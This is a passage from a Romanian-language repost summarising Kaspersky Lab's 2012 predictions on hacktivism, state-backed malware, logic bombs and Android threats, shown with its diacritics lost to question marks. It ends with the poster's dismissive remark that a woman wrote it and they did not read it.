rezultatelor afi?ate în c?ut?ri online pe anumite subiecte) vor fi mult mai populare. O alt? previziune este legat? de atacurile grupurilor de hackeri activi?ti asupra organiza?iilor de stat ?i companiilor - care vor continua ?i în 2012 ?i vor avea o agend? predominant politic?. Cu toate acestea, „hacktivism-ul” ar putea fi utilizat ca o metod? de divesiune pentru a ascunde alte tipuri de atac. Programele de malware hi-tech, cum sunt Stuxnet ?i Duqu, create cu sprijinul statelor vor r?mâne fenomene unice. Apari?ia lor va fi decis? de tensiunile interna?ionale dintre anumite ??ri, iar conflictele în spa?iul virtual se vor forma în jurul confrunt?rilor tradi?ionale: SUA ?i Israel împotriva Iranului ?i SUA ?i Europa de Vest împotriva Chinei. „Armele” de baz? care sunt construite pentru a distruge date într-un anumit moment, cum sunt „kill switches”, bombe logice etc, vor deveni mai populare deoarece sunt mai u?or de fabricat. Crearea acestor programe poate fi externalizat? c?tre furnizori priva?i utiliza?i de agen?iile militare sau guvernamentale. În multe cazuri, este posibil ca furnizorul s? nu ?tie care sunt scopurile clientului. În ceea ce prive?te amenin??rile pentru telefoane mobile, Kaspersky Lab se a?teapt? ca Google Android s? fie ?inta favorit? pentru pia?a de software periculos, care atac? terminale mobile, precum ?i s? creasc? num?rul de atacuri ce exploateaz? vulnerabilit??i. Este prognozat? ?i apari?ia primelor atacuri mobile de tip drive-by ?i a botnet-urilor mobile. Spionajul mobil se va r?spândi la scar? larg? ?i va include, cel mai probabil, furt de date de pe telefoane mobile ?i urm?rirea anumitor persoane cu ajutorul telefoanelor sau a serviciilor de localizare geografic?. Sursa: Atacuri informatice în 2012: ?inte stabilite, r?zboi cibernetic, amenin??ri mobile PS: E scris de o femeie, nu l-am citit, dar cam asta se propaga prin media.